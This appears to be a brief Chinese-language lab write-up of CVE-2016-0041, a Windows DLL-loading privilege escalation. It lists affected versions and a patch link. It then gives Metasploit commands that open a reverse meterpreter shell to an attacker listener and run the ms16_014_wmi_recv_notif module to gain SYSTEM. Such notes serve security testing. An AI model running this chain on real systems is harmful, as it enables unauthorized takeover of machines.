CVE-2016-0041
描述
错误处理了DLL加载,从而允许本地加载获得特权。
影响版本
Product | Version | Update | Edition | Tested |
---|---|---|---|---|
Windows 10 | - | |||
Windows 10 | 1511 | |||
Windows 7 | SP1 | :heavy_check_mark: | ||
Windows 8.1 | ||||
Windows Rt 8.1 | ||||
Windows Server 2008 | SP2 | :heavy_multiplication_x: | ||
Windows Server 2008 | R2 | SP1 | :heavy_multiplication_x: | |
Windows Server 2012 | :heavy_multiplication_x: | |||
Windows Server 2012 | R2 | :heavy_multiplication_x: | ||
Windows Vista | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0041
利用方式
测试了网上能够找到的c++代码版本,Windows 7 x86/x64都会蓝屏,Windows Server 2008/2012所有版本都没反应,所有这边只能使用MSF版本。MSF版本中只有payload/windows/x64/meterpreter/reverse_tcp
版本的反弹shell能够利用,payload/windows/meterpreter/reverse_tcp
版本利用失败
测试系统Windows 7 sp1 x64,首先进行监听
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.9
set lport 12345
run
可以看到如下的反弹shell
接着使用提权漏洞
use exploit/windows/local/ms16_014_wmi_recv_notif
set session 2#你当前的session
run
可以看到我们最后成为了SYSTEM权限